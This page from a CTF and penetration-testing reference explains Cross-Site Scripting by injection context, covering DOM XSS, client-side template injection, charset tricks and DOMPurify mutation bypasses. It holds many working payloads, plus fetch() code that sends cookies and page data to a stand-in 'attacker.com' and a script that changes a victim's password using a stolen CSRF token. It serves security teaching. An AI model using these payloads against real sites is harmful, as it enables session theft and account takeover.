🚩
Practical CTF
BlogContact
  • 🚩Home - Practical CTF
  • 🌐Web
    • Enumeration
      • Finding Hosts & Domains
      • Masscan
      • Nmap
      • OSINT
    • Client-Side
      • Cross-Site Scripting (XSS)
        • HTML Injection
        • Content-Security-Policy (CSP)
      • CSS Injection
      • Cross-Site Request Forgery (CSRF)
      • XS-Leaks
      • Window Popup Tricks
      • Header / CRLF Injection
      • WebSockets
      • Caching
    • Server-Side
      • SQL Injection
      • NoSQL Injection
      • GraphQL
      • XML External Entities (XXE)
      • HTTP Request Smuggling
      • Local File Disclosure
      • Arbitrary File Write
      • Reverse Proxies
    • Frameworks
      • Flask
      • Ruby on Rails
      • NodeJS
      • Bun
      • WordPress
      • Angular
    • Chrome Remote DevTools
    • ImageMagick
  • 🔣Cryptography
    • Encodings
    • Ciphers
    • Custom Ciphers
      • Z3 Solver
    • XOR
    • Asymmetric Encryption
      • RSA
      • Diffie-Hellman
      • PGP / GPG
    • AES
    • Hashing
      • Cracking Hashes
      • Cracking Signatures
    • Pseudo-Random Number Generators (PRNG)
    • Timing Attacks
    • Blockchain
      • Smart Contracts
      • Bitcoin addresses
  • 🔎Forensics
    • Wireshark
    • File Formats
    • Archives
    • Memory Dumps (Volatility)
    • VBA Macros
    • Grep
    • Git
    • File Recovery
  • ⚙️Reverse Engineering
    • Ghidra
    • Angr Solver
    • Reversing C# - .NET / Unity
    • PowerShell
  • 📟Binary Exploitation
    • ir0nstone's Binary Exploitation Notes
    • Reverse Engineering for Pwn
    • PwnTools
    • ret2win
    • ret2libc
    • Shellcode
    • Stack Canaries
    • Return-Oriented Programming (ROP)
      • SigReturn-Oriented Programming (SROP)
      • ret2dlresolve
    • Sandboxes (chroot, seccomp & namespaces)
    • Race Conditions
  • 📲Mobile
    • Setup
    • Reversing APKs
    • Patching APKs
    • HTTP(S) Proxy for Android
    • Android Backup
    • Compiling C for Android
    • iOS
  • 🌎Languages
    • PHP
    • Python
    • JavaScript
      • Prototype Pollution
      • postMessage Exploitation
    • Java
    • C#
    • Assembly
    • Markdown
    • LaTeX
    • JSON
    • YAML
    • CodeQL
    • NASL (Nessus Plugins)
    • Regular Expressions (RegEx)
  • 🤖Networking
    • Modbus - TCP/502
    • Redis/Valkey - TCP/6379
  • 🐧Linux
    • Shells
    • Bash
    • Linux Privilege Escalation
      • Enumeration
      • Networking
      • Command Triggers
      • Command Exploitation
      • Outdated Versions
      • Network File Sharing (NFS)
      • Docker
      • Filesystem Permissions
    • Analyzing Processes
  • 🪟Windows
    • The Hacker Recipes - AD
    • Scanning/Spraying
    • Exploitation
    • Local Enumeration
    • Local Privilege Escalation
    • Windows Authentication
      • Kerberos
      • NTLM
    • Lateral Movement
    • Active Directory Privilege Escalation
    • Persistence
    • Antivirus Evasion
    • Metasploit
    • Alternate Data Streams (ADS)
  • ☁️Cloud
    • Kubernetes
    • Microsoft Azure
  • ❔Other
    • Business Logic Errors
    • Password Managers
    • ANSI Escape Codes
    • WSL Tips
Powered by GitBook
On this page
  • # Related Pages
  • Description
  • Contexts
  • HTML Injection
  • Attribute Injection
  • Script Injection
  • DOM XSS
  • Client-Side Template Injection
  • Alternative Charsets
  • Exploitation
  • From another site
  • Stealing Cookies
  • Forcing requests - fetch()
  • HTML Injection
  • Protections
  • Filter Bypasses
  • Mutation XSS & DOMPurify
  1. Web
  2. Client-Side

Cross-Site Scripting (XSS)

Inject JavaScript code on victims to perform actions on their behalf

PreviousClient-SideNextHTML Injection

Last updated 1 day ago

# Related Pages

Description

Cross-Site Scripting (XSS) is a very broad topic, but it revolves around one idea: executing malicious JavaScript. This is often from an attacker's site, hence "Cross-Site" scripting. A common distinction made between types of XSS is:

  • Reflected XSS: Inject HTML as some content from a parameter that is reflected directly on the target page. This payload is not stored and is seen only if the malicious URL is visited

  • Stored XSS: Store a payload somewhere, which is later loaded insecurely which places the injected HTML directly onto the page. The difference here is that the payload is saved on the server side in some way, and is later retrieved by a victim

  • DOM XSS: A special variant not using HTML, but rather the Document Object Model (DOM) in JavaScript code itself. When malicious data ends up in JavaScript "sinks" that are able to execute code, such as location = "javascript:...", the payload is triggered via the DOM. The payload may still be either reflected or stored, but it is often called DOM XSS

The most basic form of XSS looks like this. Imagine a page that takes some parameter as input, and reflects it back in the response without any filtering:

<?php echo $_GET["html"];

The intention might be that we can write some styled code like <b>hello</b> to write in bold, but instead, an attacker can use a tag like <script> to include JavaScript code:

http://example.com/page?html=<script>alert(document.cookie)</script>

This will place the document.cookie value (all your Cookies, like session tokens) in a simple alert() box that pops up on your screen. This is a common proof-of-concept to show an attacker is able to access and possibly exfiltrate a user's cookies in order to impersonate them.

Contexts

There are a few different places where your input might end up inside HTML to create dynamic pages. Here are a few common ones for example:

Tag context
<p>INJECTION_HERE</p>
Attribute context
<img src="INJECTION_HERE">
Script context
<script>
    let a = "INJECTION_HERE";
</script>

Depending on the context, you will need different syntax to do the following steps:

  1. Escape the original code, by closing tags (eg. </textarea>) or strings (" or ')

  2. Write the JavaScript payload that will execute

  3. Possibly fixing the rest of the code that normally comes after, to prevent errors

For the Attribute context as an example, we could exploit it by 1. Escaping by starting with a " that will close off the string, then 2. Add our own attribute like onerror=alert() to execute a function when the image fails to load, and finally 3. Close off the last quote by ending with something meaningless like x=" that will be closed by a quote. Altogether it could look like this:

<img src="INJECTION_HERE">
Payload: " onerror=alert() x="
<img src="" onerror=alert() x="">

When this is rendered to the page, the image with src="" will likely fail to load as the current page is not an image. Then the onerror= handler is triggered to pop an alert box open, and the tag is closed cleanly. This is the basic idea for all JavaScript Injections. The following sections will explore the various contexts in more detail.

HTML Injection

With zero protections, the simplest-to-understand injection is:

<script>alert()</script>

This starts JavaScript syntax using the <script> tag, and executes the alert() function. There are however a few caveats that will result in this payload not always working. The most important is the difference between server-inserted code and client-inserted code. When the server inserts your script into the HTML, the browser doesn't know any better and trusts the code so it will be run as if it is part of the first original page. When instead the code is possibly fetched and then inserted by some other client-side JavaScript code like element.innerHTML = "<script>...", it will be inserted after the document has already loaded, and follow some different rules. For one, inline scripts like these won't execute directly, as well as some other elements that are not directly loaded after they have been inserted into the DOM.

Because of the above reasons, it is often a safer idea to use a common payload like:

<img src onerror=alert()>

The special thing about this payload is that an image should be loaded, which the browser really wants to do as soon as it is inserted, even on the client side. This causes the onerror= handler to instantly trigger consistently, no matter how it is inserted (read more details in #triggers). In some cases a common variation is the following:

<!-- Shortest payload -->
<svg onload=alert()>
<!-- Short but universal -->
<style onload=alert()>

The small difference between these two payloads is that the first works everywhere except Firefox client-inserted, and the second works everywhere while remaining relatively short.

Special Tags

When inserted into the content of a <textarea>, JavaScript code won't be directly executed in any way. Therefore you need to first close this specific tag using </textarea>, and then continue with a regular XSS payload like normal.

<!-- Doesn't execute -->
<textarea><img src onerror=alert()></textarea>
<!-- Does execute! -->
<textarea></textarea><img src onerror=alert()></textarea>

Common Filter Bypasses

While the above are simple, they are also the most common, and many filters already recognize these patterns as malicious and block or sanitize your payload in some way that will try to make it safe. This topic is explored more in Filter Bypasses, but a few of the best tricks are displayed here. The first is when a RegEx pattern like <[^>]> expects a > to close a tag, which can be omitted often because another future tag will close it for you:

Payload
<style onload=alert() x=
Context
<p><style onload=alert() x=</p>
<!-- Dynamically set href= attribute using SVG animation, with "javascript:" partially in attribute value -->
<svg><a><animate attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://example.com?&semi;javascript:alert(origin)&semi;0" /><text x=20 y=20>XSS</text></a>

<!-- Using iframe srcdoc= attribute to include encoded HTML -->
<iframe srcdoc="&lt;img src=1 o&#110;error=alert(1)&gt;"></iframe>

<!-- Link requiring user interaction with javascript: URL -->
<a href="&#106avas&#99ript:alert()">Click me!</a>

One last payload is a less well-known tag called <base> which takes an href= attribute that will decide where any relative URLs will start from. If you set this to your domain for example, and later in the document a <script src="/some/file.js"> is loaded, it will instead be loaded from your website at the path of the script.

<base href=//xss.jorianwoltjer.com>

<!-- Any normal relative script after this payload will be taken from the base -->
<script src="/some/file.js">
<!-- ^^ Will fetch 'http://xss.jorianwoltjer.com/some/file.js' instead -->
http://example.com/path#alert(document.domain)

See Filter Bypasses for a more broad approach to make your own bypass.

In case you really can't get a full-blown XSS, check out what other impactful things you may be able to do with HTML Injection.

Alternative Impact

Attribute Injection

While HTML Injection is easy when you are injecting directly into a tag's contents, sometimes the injection point is inside a tag's attribute instead:

<img src="INJECTION_HERE">
<img src='INJECTION_HERE'>
<img src=INJECTION_HERE>

This is a blessing and a curse because it might look harder at first, but this actually opens up some new attack ideas that might not have been possible before. Of course, the same HTML Injection idea from before works just as well, if we close the attribute and start writing HTML:

Payload: "><style onload=alert()>
<img src=""><style onload=alert()>">

However, this is not always possible as the < and > characters are often HTML encoded like &lt; and &gt; to make them represent data, not code. This would not allow us to close the <img> tag or open a new tag to add an event handler to, but in this case we don't need it! Since we are already in an <img> tag, we can simply add an attribute to it with a JavaScript event handler that will trigger:

Payload: " onerror=alert() x="
<img src="" onerror=alert() x="">
<input value="INJECTION_HERE">
Payload: " onfocus=alert() autofocus x="
<input value="" onfocus=alert() autofocus x="">

Script Injection

A special case is when the injection is found inside of a <script> tag. This may be done by developers when they want to give JavaScript access to some data, often JSON or a string, without requiring another request to fetch that data. When implemented without enough sanitization, however, this can be very dangerous as tags might not even be needed to reach XSS.

<script>
    let a = "INJECTION_HERE";
</script>

As always, a possibility is simply closing the context and starting an HTML Injection, this is common in JSON stringifictions because while the string may be safe, you can still close the script tag:

Payload: </script><style onload=alert()>
<script>
    let a = "</script><style onload=alert()>";
</script>

If these < or > characters are blocked or encoded however, we need to be more clever. Similarly to Attribute Injection, we can close only this string, and then write out arbitrary JavaScript code because are already in a <script> block. Using the - subtract symbol, JavaScript needs to evaluate both sides of the expression, and after seeing the empty "" string, it will run the alert() function. Finally, we need to end with a comment to prevent SyntaxErrors:

Payload: "-alert()//
<script>
    let a = ""-alert()//"";
</script>

Another special place you might find yourself injecting into is template literals, surrounded by ` backticks, which allow variables and expressions to be evaluated inside of the string. This opens up more possible syntax to run arbitrary JavaScript without even having to escape the string:

Payload: ${alert()}
<script>
    let a = `${alert()}`;
</script>

Double Injection \ backslash trick

One last trick is useful when you cannot escape the string with just a " quote, but when you do have two injections on the same line.

Failed attempt
Payload 1: "-alert()//
Payload 2: something
<script>
    let a = {first: "&quot;-alert()//", second: "something"};
</script>
Injection causes error
Payload 1: anything\
Payload 2: something
<script>
    let a = {first: "anything\", second: "something"};
</script>

The critical part here is that the 2nd string that would normally start the string is now stopping the first string instead. Afterwards, it switches to regular JavaScript context starting directly with our second input, which no longer needs to escape anything. If we now write valid JavaScript here, it will execute (note that we also have to close the }):

Success
Payload 1: anything\
Payload 2: -alert()}//
<script>
    let a = {first: "anything\", second: "-alert()}//"};
</script>

Escaped / bypass using <!-- comment

When injecting into a script tag that disallows quotes ("), you may quickly jump to injecting </script> to close the whole script tag and start a new one with your payload. If the / character is not allowed, however, you cannot close the script tag in this way.

Vulnerable
<script>
  console.log("");
</script>
<input type="text" value="">
Exploit
<script>
  console.log("<!--<script>");
</script>
<input type="text" value="--></script><script>alert()</script>">

Notice that the closing script tag on line 3 doesn't close it anymore, but instead, only after the closing comment inside of the attribute, it is allowed to again. By there closing it ourselves from inside the attribute, we are in an HTML context and can write any XSS payload!

For more advanced tricks and pitfalls, check out the JavaScript page!

DOM XSS

This is slightly different than previous "injection" ideas and is more focused on what special syntax can make certain "sinks" execute JavaScript code.

The Document Object Model (DOM) is JavaScript's view of the HTML on a page. To create complex logic and interactivity with elements on the page there are some functions in JavaScript that allow you to interact with it. As a simple example, the document.getElementById() function can find an element with a specific id= attribute, on which you can then access properties like .innerHTML:

<p id="hello">Hello, <b>world</b>!</p>
<script>
    let element = document.getElementById("hello");
    console.log(element.innerHTML);  // "Hello, <b>world</b>!"
</script>

DOM XSS is where an attacker can abuse the interactivity with HTML functions from within JavaScript by providing sources that contain a payload, which end up in sinks where a payload may trigger. A common example is setting the .innerHTML property of an element, which replaces all HTML children of that element with the string you set. If an attacker controls any part of this without sanitization, they can perform HTML Injection just as if it was reflected by the server. A payload like the following would instantly trigger an alert():

<p id="hello">Hello, world!</p>
<script>
    let element = document.getElementById("hello");
    element.innerHTML = "<img src onerror=alert()>";
</script>

When any of this controllable data ends up in a sink without enough sanitization, you might have an XSS on your hands. Just like contexts, different sinks require different payloads. A location = sink for example, can be exploited using the javascript:alert() protocol to evaluate the code, and an eval() sink could require escaping the context like in Script Injection.

Note: A special less-known property is window.name which is surprisingly also cross-origin writable. If this value is used in any sink, you can simply open it in an iframe or window like shown below and set the .name property on it!

JQuery - $()

A special case is made for JQuery as it is still to this day a popular library used by many applications to ease DOM manipulation from JavaScript. The $() selector can find an element on the page with a similar syntax to the more verbose but native document.querySelector() function (CSS Selectors). It would make sense that these selectors would be safe, but if unsanitized user input finds its way into the selector string of this $ function, it will actually lead to XSS as .innerHTML is used under the hood!

Old vulnerable example
$(window).on('hashchange', function() {
    var element = $(location.hash);
    element[0].scrollIntoView();
});

If the target allows being iframed, a simple way to exploit this is by loading the target and changing the src= attribute after it loads:

Using iframe
<iframe src="https://target.com/#" onload="this.src+='<img src onerror=alert()>'">
Using window
<button onclick=start()>Start</button>
<script>
    function start() {  // Open a new tab
        let target = open("https://target.com/#");
        setTimeout(function () {  // Wait for target to load
            target.location = "https://target.com/#<img src onerror=alert()>";
        }, 2000);
    }
</script>

Important to note is that the vulnerable code above with $(location.hash) above is not vulnerable anymore with recent versions of JQuery because an extra rule was added that selectors starting with # are not allowed to have HTML, but anything else is still vulnerable. A snippet like below will still be vulnerable in modern versions because it is not prefixed with #, and it URL decodes the payload allowing the required special characters. Context does not matter here, simply <img src onerror=alert()> anywhere in the selector will work.

Modern vulnerable example
let hash = decodeURIComponent(window.location.hash.slice(1));
$(`h2:contains(${hash})`);

JQuery also has many other methods and CVEs if malicious input ends up in specific functions. Make sure to check all functions your input travels through for possible DOM XSS.

Triggers (HTML sinks)

  1. .innerHTML
    let div = document.createElement("div")
    div.innerHTML = "<img src onerror=alert()>"
  2. .innerHTML + DOM
    let div = document.createElement("div")
    document.body.appendChild(div)
    div.innerHTML = "<img src onerror=alert()>"
  3. write()
    document.write("<img src onerror=alert()")
  4. open() write() close()
    document.open()
    document.write("<img src onerror=alert()")
    document.close()

When placing common XSS payloads in the triggers above, it becomes clear that they are not all the same. Most notably, the <img src onerror=alert()> payload is the most universal as it works in every situation, even when it is not added to the DOM yet. The common and short <svg onload=alert()> payload is interesting as it is only triggered via .innerHTML on Chome, and not Firefox. Lastly, the <script> tag does not load when added with .innerHTML at all.

Client-Side Template Injection

Templating frameworks help fill out HTML with user data and try to make interaction easier. While this often helps with auto-escaping special characters, it can hurt in some other ways when the templating language itself can be injected without HTML tags, or using normally safe HTML that isn't sanitized.

AngularJS is a common web framework for the frontend. It allows easy interactivity by adding special attributes and syntax that it recognizes and executes. This also exposes some new ways for HTML/Text injections to execute arbitrary JavaScript if regular ways are blocked. One caveat is that all these injections need to happen inside an element with an ng-app attribute to enable this feature.

Here are a few examples of how it can be abused on the latest version. All alerts fire on load:

<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.3/angular.min.js"></script>

<body ng-app>
  <!-- Text injection -->
  {{constructor.constructor('alert(1)')()}}
  <!-- Attribute injection -->
  <ANY ng-init="constructor.constructor('alert(2)')()"></ANY>
  <!-- Filter bypass (even DOMPurify!) -->
  <ANY data-ng-init="constructor.constructor('alert(3)')()"></ANY>
  <ANY class="ng-init:constructor.constructor('alert(4)')()"></ANY>
  <ANY class="AAA;ng-init:constructor.constructor('alert(5)')()"></ANY>
  <ANY class="AAA!ng-init:constructor.constructor('alert(6)')()"></ANY>
  <ANY class="AAA♩♬♪ng-init:constructor.constructor('alert(7)')()"></ANY>
  <!-- Dynamic content insertion also vulnerable (only during load) -->
  <script>
    document.body.innerHTML += `<ANY ng-init="constructor.constructor('alert(8)')()"></ANY>`;
  </script>
</body>
<!-- Everything also works under `data-ng-app`, fully bypassing DOMPurify! -->
<div data-ng-app>
  ...
  <b data-ng-init="constructor.constructor('alert(9)')()"></b>
</div>

In some older versions of AngularJS, there was a sandbox preventing some of these arbitrary code executions. Every version has been bypassed, however, leading to how it is now without any sandbox. See the following page for a history of these older sandboxes:

Warning:

Newer versions of Angular (v2+) instead of AngularJS (v1) are not vulnerable in this way. Read more about this in Angular.

Note: Injecting content with .innerHTML does not always work, because it is only triggered when AngularJS loads. If you inject content later from a fetch, for example, it would not trigger even if a parent contains ng-app.

<script src="https://cdn.jsdelivr.net/npm/vue@2.5.13/dist/vue.js"></script>

<div id="app">
  <p>{{this.constructor.constructor('alert(1)')()}}</p>
  <p>{{this.$el.ownerDocument.defaultView.alert(2)}}</p>
</div>
<script>
  new Vue({
    el: "#app",
  });
</script>
<script src="https://unpkg.com/htmx.org@1.9.12"></script>

<!-- Old syntax, simple eval -->
<img src="x" hx-on="error:alert(1)" />
<!-- Normally impossible elements allow injecting JavaScript into eval'ed function! -->
<meta hx-trigger="x[1)}),alert(2);//]" />
<div hx-disable>
  <!-- Inside hx-disable, new syntax still works -->
  <img src="x" hx-on:error="alert(3)" />
  <!-- Everything can be prefixed with data-, bypassing DOMPurify! -->
  <img src="x" data-hx-on:error="alert(4)" />
</div>

Alternative Charsets

Note: In this section, some ESC characters are replaced with \x1b for clarity. You can copy a real ESC control character from the code block below:



If a response contains any of the following two lines, it is safe from the following attack.

Safe
Content-Type: text/html; charset=utf-8
...
<meta charset="UTF-8">

If this charset is missing, however, things get interesting. Browsers automatically detect encodings in this scenario. The ISO-2022-JP encoding has the following special escape sequences:

Escape Sequence
Copy
Meaning

\x1b(B

switch to ASCII (default)

\x1b(J

switch to JIS X 0201 1976 (backslash swapped)

\x1b$@

switch to JIS X 0201 1978 (2 bytes per char)

\x1b$B

switch to JIS X 0201 1983 (2 bytes per char)

These sequences can be used at any point in the HTML context (not JavaScript) and instantly switch how the browser maps bytes to characters. JIS X 0201 1976 is almost the same as ASCII, except for \ being replaced with ¥, and ~ replaced with ‾.

1. Negating Backslash Escaping

For the first attack, we can make \ characters useless after having written \x1b(J. Strings inside <script> tags are often protected by escaping quotes with backslashes, so this can bypass such protections:

2. Breaking HTML Context

The JIS X 0201 1978 and JIS X 0201 1983 charsets are useful for a different kind of attack. They turn sequences of 2 bytes into 1 character, effectively obfuscating any characters that would normally come after it. This continues until another escape sequence to reset the encoding is encountered like switching to ASCII.

An example is if you have control over some value in an attribute that is later closed with a double quote ("). By inserting this switching escape sequence, the succeeding bytes including this closing double quote will become invalid Unicode, and lose their meaning.

By later in a different context ending the obfuscation with a reset to ASCII escape sequence, we will still be in the attribute context for HTML's sake. The text that was sanitized as text before, is now put into an attribute which can cause all sorts of issues.

With the next image tag being created, it creates an unexpected scenario where the opening tag is actually still part of the attribute, and the opening of its first attribute instead closes the existing one.

The 1.png string is now syntax-highlighted as red, meaning it is now the name of an attribute instead of a value. If we write onerror=alert(1)// here instead, a malicious attribute is added that will execute JavaScript without being sanitized:

This technique can also trivially bypass any server-side XSS protection (eg. DOMPurify) such as in the following challenge:

Payload
<img src="src\x1b$@">text\x1b(B<img src="onerror=alert()//">
const html = `<img src="src\x1b$@">text\x1b(B<img src="onerror=alert(origin)//">`;
const blob = new Blob([html], { type: "text/html" });  // missing charset here
window.open(URL.createObjectURL(blob));  // opened in another top-level context

Not in all context will the charset be heuristically detected. The top-most same-origin frame will decide, so if the above blob URL was iframed, for example, the exploit wouldn't work. This is because the parent frame's charset will be inherited by the iframe, it won't be detected again.

Exploitation

Making an alert() pop up is cool, but to show the impact it might be necessary to exploit what an XSS or JavaScript execution gives you. The summary is that you can do almost everything a user can do themselves, but do this for them. You can click buttons, request pages, post data, etc. which open up a large field of impact, depending on what an application lets the user do.

From another site

The easiest is Reflected XSS, which should trigger when a specific URL is triggered. If someone visits your page, you can simply redirect them to the malicious URL with any payload to trigger the XSS:

Example attacker page
<script>
    location = "https://target.com/endpoint?xss=<style onload=alert()>"
</script>

For Stored XSS, a more likely scenario might be someone else stumbling upon the payload by using the site normally, but if the location is known by the attacker they can also redirect a victim to it in the same way as Reflected XSS as shown above.

Some exploits require more complex interaction between the attacker and the target site, like <iframe>'ing (only if #content-security-policy-csp and X-Frame-Options allows) or opening windows (only when handling user interaction like pressing a button with onclick=).

Stealing Cookies

In the early days of XSS, this was often the target vector for exploitation, as session cookies could be stolen and exfiltrated to an attacker to later impersonate them on demand. This is done with the document.cookie variable that contains all cookies as a string. Then using fetch() a request containing this data can be made to the attacker's server to read remotely:

fetch("http://attacker.com/leak?cookie=" + document.cookie)

Pretty often, however, modern frameworks will set the httpOnly flag on cookies which means they will not be available for JavaScript, only when making HTTP requests. This document.cookie variable will simply not contain the cookie that the flag is on, meaning it cannot be exfiltrated directly. But the possibilities do not end here, as you can still make requests using the cookies from within JavaScript, just not directly read them.

In very restricted scenarios you might not be able to make an outbound connection due to the connect-src #content-security-policy-csp directive. See that chapter for ideas on how to still exfiltrate data

Forcing requests - fetch()

One idea to still steal cookies would be to request a page that responds with the cookie information in some way, like a debug or error page. You can then request this via JavaScript fetch() and exfiltrate the response:

Payload
fetch("http://target.com/debug")  // Perform request
    .then(res => res.text())      // Read response as text
    .then(res => fetch("http://attacker.com/leak?" + res));
Logs of attacker.com
"GET /leak?session=... HTTP/1.1" 404 -

Tip: For more complex data, you can use btoa(res) to Base64 encode the data which makes sure no special characters are included, which you can later decode

A more common way of exploitation is by requesting personal data from a settings page or API route, which works in a very similar way as shown above.

Performing actions

Payload
fetch("http://target.com/api/change_password", {
    method: "POST",
    headers: {
        "Content-Type": "application/json",
        "X-Custom-Header": "anything"
    },
    body: JSON.stringify({
        "password": "hacked",
        "confirm_password": "hacked"
    })
})
HTTP Request
POST /api/change_password HTTP/1.1
Host: target.com
Cookie: session=...
X-Custom-Header: anything
Content-Type: application/json
Content-Length: 49

{"password":"hacked","confirm_password":"hacked"}

Due to fetch() only being a simple function call, you can create a very complex sequence of actions in JavaScript code to execute on the victim, as some actions require some setup. You could create an API token using one request, and then use it in the next to perform some API call. Or a more common example is fetching a Cross-Site Request Forgery (CSRF) token from some form, and then using that token to POST data if it is protected in that way. As you can see, CSRF tokens do not protect against XSS:

fetch("http://target.com/login")  // Request to some form with CSRF token
    .then(res => res.text())
    .then(res => {
        // Extract CSRF token
        const csrf_token = res.match(/<input type="hidden" name="csrf_token" value="(.*)" \/>/)[1];
        // Build password reset form data
        const form = new FormData();
        form.append("csrf_token", csrf_token);
        form.append("password", "hacked");
        form.append("confirm_password", "hacked");

        // Perform another request with leaked token
        fetch("http://target.com/change_password", {
            method: "POST",
            body: form
        });
    });

Tip: If there is no CSRF token, you may also be able to send SameSite=Strict cookies from another subdomain that you have XSS on to a target, because the are considered same-site. Read more about this in Cross-Site Request Forgery (CSRF).

HTML Injection

With JavaScript execution, you can also perform all tricks explained in the page below. With impact like leaking the current URL, content on the page, or phishing password managers:

history.replaceState(null, null, "/login");

Protections

XSS is a well-known issue, and many protections try to limit its possibility on websites. There are basically two cases a website needs to handle when reflecting a user's content:

  1. Content, but no HTML is allowed (almost all data)

  2. Limited HTML tags are allowed (rich text like editors)

The 1st is very easily protected by using HTML Encoding. Many frameworks already do this by default, and explicitly have you write some extra code to turn it off. Most often this encodes only the special characters like < to &lt;, > to &gt;, and " to &quot;. While this type of protection is completely safe in most cases, some situations exist where these specific characters are not required to achieve XSS. We've seen examples of Attribute Injection where a ' single quote is used instead, which may not be encoded and thus can be escaped. Or when your attribute is not enclosed at all and a simple space character can add another malicious attribute. With Script Injection this is a similar story, as well as DOM XSS.

One common protection is a Content-Security-Policy: response header, which can protect against various client-side attacks by restricting what researches may be "trusted" and executed:

Filter Bypasses

Some of the most useful and common filter bypasses are shown in Common Filter Bypasses.

If a server is checking your input for suspicious strings, they will have a hard time as there are many ways to obfuscate your payloads. Even a simple <a href=...> tag has many places where the browser allows special and unexpected characters, which may break the pattern the server is trying to search for. Here is a clear diagram showing where you can insert what characters:

The XSS Cheat Sheet by PortSwigger has an extremely comprehensive list of all possible tags, attributes, and browsers that allow JavaScript execution, with varying levels of user interaction:

You can use the above list to filter certain tags you know are allowed/blocked, and copy all payloads for fuzzing using a tool to find what gets through a filter.

JavaScript payload

In case you are able to inject JavaScript correctly but are unable to exploit it due to the filter blocking your JavaScript payload, there are many tricks to still achieve code execution. One of them is using the location variable, which can be assigned to a javascript: URL just like in DOM XSS, but this is now a very simple function call trigger as we don't need parentheses or backticks, as we can escape them in a string like \x28 and \x29.

location="javascript:alert\x28\x29"
JavaScript Payload
location=name
Attacker's page
<script>
  name = "javascript:alert()";
  window.open("https://target.com/?xss=location%3Dname", "_self");
  // use of "_self" doesn't require interaction, and works on Firefox
</script>

Mutation XSS & DOMPurify

Mutation XSS is a special kind of XSS payload where you are abusing a difference in the checking environment vs. the destination environment. There are some special browser rules for when HTML finds itself in certain tags, that are different from inside other tags. This difference can sometimes be abused to create a benign payload in the checking context but will be mutated by the browser in a different context into a malicious payload.

I myself went into detail on this technique in late 2024, and explain the ideas in detail in the blog post below, together with some new tricks:

DOMPurify
<p id="</title><img src=x onerror=alert()>"></p>

There is a <p> tag with "</title><img src=x onerror=alert()>" as its id= attribute, nothing more, and nothing that would trigger JavaScript surely. But then comes along the browser, which sees this payload placed into the DOM, inside the existing <title> tag:

Browser DOM
<title>
    <p id="</title><img src=x onerror=alert()>"></p>
</title>

Perhaps surprisingly, it is parsed differently now that it is inside of the <title> tag. Instead of a simple <p> tag with an id= attribute, this turned into the following after mutation:

Browser DOM after mutation
<html><head><title>
    &lt;p id="</title></head><body><img src="x" onerror="alert()">"&gt;<p></p>
</body></html>

See what happened here? It suddenly closed with the </title> tag and started an <img> tag with the malicious onerror= attribute, executing JavaScript, and causing XSS! This means in the following example, alert(1) fires but alert(2) does not:

Demo
<title>
    <p id="</title><img src=x onerror=alert(1)>"></p>
</title>
<p id="</title><img src=x onerror=alert(2)>"></p>

DOMPurify does not know of the <title> tag the application puts it in later, so it can only say if the HTML is safe on its own. In this case, it is, so we bypass the check through Mutation XSS.

A quick for-loop later we can find that this same syntax works for all these tags: iframe, noembed, noframes, noscript, script, style, textarea, title, xmp

These types of Mutation XSS tricks are highly useful in bypassing simpler sanitizer parsers because DOMPurify had to really put in some effort to get this far. Writing payloads that put the real XSS in an attribute and use mutation to escape out of it can be unexpected and the developers may not have thought about the possibility, and only use some regexes or naive parsing.

Where this gets really powerful is using HTML encoding if the sanitizer parses the payload, and then reassembles the HTML afterward, for example:

<title><p id="&lt;&sol;title&gt;&lt;img src&equals;x onerror&equals;alert&lpar;&rpar;&gt;"></p></title>
<!-- could be serialized back into this Mutation XSS -->
<title><p id="</title><img src=x onerror=alert()>"></p></title>

<svg>
    a<style><!--</style><a id="--!><img src=x onerror=alert()>"></a>
</svg>

This is another DOMPurify "bypass" with a more common threat, all a developer needs to do is put your payload inside of an <svg> tag, without sanitizing it with the <svg> tag. This payload is a bit more complicated as you'll see, but here's a breakdown: The trick is the difference between SVG parsing and HTML parsing. In HTML which DOMPurify sees, the <style> tag is special as it switches the parsing context to CSS, which doesn't support comments like <!-- and it won't be interpreted as such. Therefore the </style> closes it and the <a id="..."> opens another innocent tag and attribute. DOMPurify doesn't notify anything wrong here and won't alter the input. In SVG, however, the <style> tag doesn't exist and it is interpreted as any other invalid tag in XML. The children inside might be more tags, a <!-- comment in this case. This only ends at the start of the <a id="--!> attribute and that means after the comment comes more raw HTML. Then our <img onerror=> tag is read for real and the JavaScript is executed!

Tip: Instead of a comment, another possibility is using the special <![CDATA[ ... ]] syntax in SVGs that abuses a similar parsing difference:

<svg>
    a<style><![CDATA[</style><a id="]]><img src=x onerror=alert()>"></a>
</svg>

DOMPurify outdated versions

DOMPurify 2.2.3 Bypass
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src onerror=alert(origin)>">

Earlier Proof of Concepts:

For the latest news and configuration-dependent bypasses, check out the changelog:

Resources

For more tricks and finding your own custom vectors, check out the following cheatsheet and tool:

It is common for dangerous tags to be blacklisted, and any event handler attributes like onload and onerror to be blocked. There are some payloads however that can encode data to hide these obligatory strings (&#110; = HTML-encoded n, ):

To exploit and show a proof of concept of the above trick, I set up that returns the same script for every path with any payload you put into that URL hash. This means you can include this injection anywhere, and put a JavaScript payload after the # symbol of the target URL which will then be executed:

Styles using CSS can also be dangerous. Not only to restyle the page, but with selectors and URLs any secrets on the page like CSRF tokens or other private data can be exfiltrated. For details on exploiting this, see , an , and finally .

The same goes for ' single quotes and no quotes at all, which just need spaces to separate attributes. Using the you can filter for possible triggers of JavaScript using attributes on your specific tag by filtering it and looking at the payloads. Some of these will require some user interaction like onclick=, but others won't. A useful trick with <input> tags specifically is the onfocus= attribute, together with the autofocus attribute which will combine to make it into a payload not requiring user interaction.

The important piece of knowledge is that any character escaped using a \ backslash character, which will interpret the character as data instead of code (see for a table of all special backslash escapes). With this knowledge, we know a \" character will continue the string and not stop it. Therefore if we end our input with a \ character, a " quote will be appended to it which would normally close the string, but because of our injection cause it to continue and mess up the syntax:

Instead, we can abuse a lesser-known feature of script contents (), where for legacy reasons, <!-- and <script strings need to be balanced. When opening a HTML comment inside a script tag, any closing script tags before a closing comment tag will be ignored. If another later input of ours contains -->, only then will the script tag be allowed to close via a closing script tag again.

This can cause all sorts of problems as shown in the example below (, ):

Sources are where data comes from, and there are many for JavaScript. There might be a URL parameter from that is put in some HTML code, location.hash for #... data after a URL, simply a fetch(), document.referrer, and even "message" listeners which allow communication between origins.

A snippet like the following was very commonly exploited ():

